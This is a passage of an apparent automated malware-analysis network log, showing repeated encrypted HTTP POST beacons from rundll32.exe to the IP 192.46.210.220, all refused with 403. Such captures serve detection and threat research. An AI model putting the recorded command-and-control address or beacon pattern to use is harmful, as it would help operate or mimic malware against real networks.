2021-10-28 03:27:24 UTC	172	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:25 UTC	177	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:24 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.3	49900	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:28 UTC	177	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:28 UTC	178	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:28 UTC	187	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:28 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.3	49901	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:28 UTC	182	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:28 UTC	182	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:28 UTC	187	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:28 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.3	49909	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:32 UTC	187	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:32 UTC	187	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:32 UTC	197	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:32 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.3	49910	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:32 UTC	192	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:32 UTC	192	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:32 UTC	197	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:32 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49764	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:23 UTC	19	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:26:23 UTC	19	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:26:24 UTC	29	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:26:24 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.3	49931	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:35 UTC	197	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:35 UTC	197	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:36 UTC	207	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:36 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.3	49932	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:35 UTC	202	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:35 UTC	202	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:36 UTC	207	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:36 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.3	49957	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:39 UTC	207	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:39 UTC	207	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:40 UTC	217	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:40 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.3	49959	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:40 UTC	212	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:40 UTC	212	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:40 UTC	217	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:40 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.3	49969	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:43 UTC	217	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:43 UTC	217	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:44 UTC	227	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:44 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.3	49970	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:44 UTC	222	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:44 UTC	222	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:44 UTC	227	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:44 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.3	49977	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:47 UTC	227	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:47 UTC	227	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:48 UTC	236	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:48 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.3	49978	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:48 UTC	232	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:48 UTC	232	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:48 UTC	237	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:48 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.3	49985	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:51 UTC	237	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:51 UTC	237	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 